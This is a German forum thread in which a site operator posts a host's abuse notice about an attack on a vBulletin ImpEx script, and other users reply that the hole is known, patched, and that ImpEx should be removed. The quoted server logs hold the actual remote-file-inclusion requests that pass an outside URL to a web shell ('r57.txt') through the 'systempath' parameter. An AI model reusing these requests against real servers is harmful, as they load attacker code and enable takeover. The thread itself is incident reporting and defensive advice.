Hallo!

Ich nutze: Version 3.6.3

Ich habe folgende Information erhalten:

wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

Es handelt sich um das Script "/forum/impex/ImpExData.php", welches über
den Parameter "systempath" die Ausführung beliebigen Codes erlaubt:

80.181.150.153 - - [29/May/2007:04:22:04 +0200] "GET
/forum/impex/ImpExData.php?systempath=http://www.gonfiabiligamespark.it/
flash/r57.txt? HTTP/1.1" 200 33952 www."-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "-"
80.181.150.153 - - [29/May/2007:04:37:14 +0200] "POST
/forum/impex/ImpExData.php?systempath=http://www.gonfiabiligamespark.it/
flash/r57.txt? HTTP/1.1" 200 32499
"http://www.rea.de/forum/impex/ImpExData.php?systempath=http://
www.gonfiabiligamespark.it/flash/r57.txt?" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "-"
usw.
Wir haben das Betreffende Script vorerst gesperrt

Ist das schon bekannt, oder hab ich was verschlafen?

Gruss Artos

Es handelt sich um das Script "/forum/impex/ImpExData.php", welches über
den Parameter "systempath" die Ausführung beliebigen Codes erlaubt:


Wie bereits hier in diesem Forum hundertfach besprochen. Impex sollte vom Server gelöscht werden (insb. ältere Versionen) da es für eine Integration nur einmalig verwendet wird!!!

Ja, ist bekannt und behoben, genaugenommen seit April letzen Jahres: http://www.vbulletin-germany.com/forum/showthread.php?t=23303

Viele Grüße,
Stefan